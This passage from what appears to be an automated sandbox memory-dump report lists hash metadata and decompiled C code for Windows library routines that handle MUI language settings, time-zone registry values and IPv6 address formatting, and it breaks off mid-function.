Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 00C50C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00C51D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00C78788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C78788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00C78460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00C5E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00C7718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00C78460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00C7718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00C78460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00C78460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00C78460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00C7718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00C52340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00C6E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00C5E2A8(_t322,  &_v68, _v16);
								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00C6E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00C5E2A8(_t322,  &_v68, _t236);
								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00C7718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00C52340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00C6E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00C5E2A8(_v12,  &_v68, _v16);
							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00C6E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00C5E2A8(_t322,  &_v68, _t269);
							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00C7718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00C52340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00C6E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00C5E2A8(_v12,  &_v68, _v16);
						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00C6E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00C5E2A8(_t322,  &_v68, _t296);
						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00c78788
0x00c78788
0x00c78791
0x00c78794
0x00c78798
0x00c7879b
0x00c7879e
0x00c787a1
0x00c787a4
0x00c787a7
0x00c787aa
0x00c787af
0x00cc1ad3
0x00c78b0a
0x00c78b0d
0x00c78b13
0x00c78b19
0x00c78b1f
0x00c78b25
0x00c78b2b
0x00c78b31
0x00c78b37
0x00c78b3d
0x00c78b46
0x00c78b46
0x00c787c6
0x00c787d0
0x00cc1ae0
0x00cc1ae6
0x00cc1af8
0x00cc1af8
0x00cc1afd
0x00cc1afe
0x00cc1b01
0x00cc1b06
0x00cc1b06
0x00c787d6
0x00c787f2
0x00c787f7
0x00c78807
0x00c7880a
0x00c7880f
0x00c78810
0x00c78813
0x00c78818
0x00c78818
0x00c7882c
0x00c78831
0x00c78838
0x00c78908
0x00c78920
0x00c789f0
0x00c78a08
0x00c78af6
0x00c78af6
0x00c78af8
0x00c78afb
0x00cc1beb
0x00cc1beb
0x00c78b04
0x00cc1bf8
0x00cc1c0e
0x00cc1c13
0x00cc1c16
0x00cc1c16
0x00cc1bf8
0x00000000
0x00c78b04
0x00c78a0e
0x00c78a11
0x00c78a14
0x00c78a15
0x00c78a18
0x00c78a22
0x00c78b59
0x00c78a28
0x00c78a3c
0x00c78a3c
0x00c78a42
0x00cc1bb0
0x00cc1b11
0x00cc1b11
0x00000000
0x00c78a48
0x00c78a51
0x00c78a5b
0x00c78a5e
0x00c78a61
0x00c78a69
0x00c78a69
0x00c78a6d
0x00000000
0x00000000
0x00c78a74
0x00c78a7c
0x00c78a7d
0x00c78a91
0x00c78a93
0x00c78a93
0x00c78a98
0x00c78a9b
0x00c78aa1
0x00c78aa1
0x00c78aa4
0x00c78aaa
0x00c78ab1
0x00c78ac5
0x00c78ac7
0x00c78ac7
0x00c78ac5
0x00c78ace
0x00cc1bc9
0x00cc1bce
0x00cc1bd2
0x00cc1bd2
0x00c78ad8
0x00c78aeb
0x00c78aeb
0x00c78af0
0x00c78af4
0x00000000
0x00c78af4
0x00c78a42
0x00c78926
0x00c78929
0x00c7892c
0x00c7892d
0x00c78930
0x00c78935
0x00c7893a
0x00c78b51
0x00c78940
0x00c78954
0x00c78954
0x00c7895a
0x00cc1b63
0x00000000
0x00c78960
0x00c78969
0x00c78973
0x00c78976
0x00c78979
0x00c7897e
0x00c78981
0x00c78981
0x00c78986
0x00000000
0x00000000
0x00cc1b6e
0x00cc1b74
0x00cc1b7b
0x00cc1b8f
0x00cc1b91
0x00cc1b91
0x00cc1b99
0x00cc1b9c
0x00cc1ba2
0x00cc1ba2
0x00c7898c
0x00c78992
0x00c78999
0x00c789ad
0x00cc1ba8
0x00cc1ba8
0x00c789ad
0x00c789b6
0x00c789c8
0x00c789cd
0x00c789d0
0x00c789d0
0x00c789d6
0x00c789e8
0x00c789e8
0x00c789ed
0x00000000
0x00c789ed
0x00c7895a
0x00c7883e
0x00c78841
0x00c78844
0x00c78845
0x00c78848
0x00c7884d
0x00c78852
0x00c78b49
0x00c78858
0x00c7886c
0x00c7886c
0x00c78872
0x00cc1b0e
0x00000000
0x00c78878
0x00c78881
0x00c7888b
0x00c7888e
0x00c78891
0x00c78896
0x00c78899
0x00c78899
0x00c7889e
0x00000000
0x00000000
0x00cc1b21
0x00cc1b27
0x00cc1b2e
0x00cc1b42
0x00cc1b44
0x00cc1b44
0x00cc1b4c
0x00cc1b4f
0x00cc1b55
0x00cc1b55
0x00c788a4
0x00c788aa
0x00c788b1
0x00c788c5
0x00cc1b5b
0x00cc1b5b
0x00c788c5
0x00c788ce
0x00c788e0
0x00c788e5
0x00c788e8
0x00c788e8
0x00c788ee
0x00c78900
0x00c78900
0x00c78905
0x00000000
0x00c78905

APIs

_wcspbrk.LIBCMT ref: 00C78891
_wcspbrk.LIBCMT ref: 00C78979
_wcspbrk.LIBCMT ref: 00C78A61
_wcspbrk.LIBCMT ref: 00C78A9B
_wcspbrk.LIBCMT ref: 00CC1B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 00C787E6
WindowsExcludedProcs, xrefs: 00C787C1
Kernel-MUI-Language-Allowed, xrefs: 00C78827
Kernel-MUI-Language-Disallowed, xrefs: 00C78914
Kernel-MUI-Language-SKU, xrefs: 00C789FC

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
Instruction ID: 30a26aad032da08177b643aab89378772fcedc698ea7361ba43a547266216c61
Opcode Fuzzy Hash: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
Instruction Fuzzy Hash: 51F1F9B5D00209EFCF11DF95C985DEEB7B9FF08300F14846AEA15A7251DB349A49EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00D05A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00D05A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00CA7DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E00CE810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E00CE810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E00C4F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}

0x00ce8231
0x00ce8235
0x00ce823a
0x00ce8245
0x00ce824b
0x00ce825c
0x00ce8262
0x00ce8263
0x00ce8266
0x00ce8268
0x00000000
0x00ce826a
0x00ce8270
0x00ce8275
0x00ce8277
0x00ce8295
0x00ce8297
0x00ce838d
0x00ce8391
0x00ce83a9
0x00ce83ab
0x00ce83ad
0x00ce83b6
0x00ce83b9
0x00000000
0x00ce83b9
0x00ce829d
0x00ce829d
0x00ce82b6
0x00ce82b8
0x00000000
0x00ce82be
0x00ce82c0
0x00ce82d5
0x00ce82d7
0x00000000
0x00ce82dd
0x00ce82f3
0x00ce82f5
0x00000000
0x00ce82fb
0x00ce8317
0x00ce8319
0x00000000
0x00ce831b
0x00ce8332
0x00ce8334
0x00000000
0x00ce8336
0x00ce834f
0x00ce8351
0x00000000
0x00ce8353
0x00ce8353
0x00ce835a
0x00000000
0x00ce835c
0x00ce8378
0x00ce837a
0x00ce837c
0x00ce8385
0x00ce8388
0x00ce83bc
0x00ce83cf
0x00ce83cf
0x00ce837c
0x00ce835a
0x00ce8351
0x00ce8334
0x00ce8319
0x00ce82f5
0x00ce82d7
0x00ce82b8
0x00ce83d4
0x00ce83d9
0x00ce83d9
0x00ce8277
0x00ce824d
0x00ce824d
0x00ce824d
0x00ce824d
0x00ce83df

APIs

_wcsnlen.LIBCMT ref: 00CE8240
_wcsnlen.LIBCMT ref: 00CE825C

Strings

StandardBias, xrefs: 00CE82C7
DaylightBias, xrefs: 00CE8324
DynamicDaylightTimeDisabled, xrefs: 00CE83C1
StandardName, xrefs: 00CE82A8
StandardStart, xrefs: 00CE82E5
Bias, xrefs: 00CE8282
DaylightStart, xrefs: 00CE8341
TimeZoneKeyName, xrefs: 00CE836A, 00CE839B
DaylightName, xrefs: 00CE8309

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnlen
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
API String ID: 3628947076-1387797911
Opcode ID: 728a55d86133cd113e01b6a039609b3ea5e470ea610cb88828685f2034ce32be
Instruction ID: 7feb0e6a21431fb491f94c7191ed87dbb8916021aa83afb59ea4a699fae24208
Opcode Fuzzy Hash: 728a55d86133cd113e01b6a039609b3ea5e470ea610cb88828685f2034ce32be
Instruction Fuzzy Hash: 9A41B775340389BAEB029A92CC82FDF776CEF05B44F100122FA08D61D1DBB0DB19A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00C913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xc52926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xc59cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00C87707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
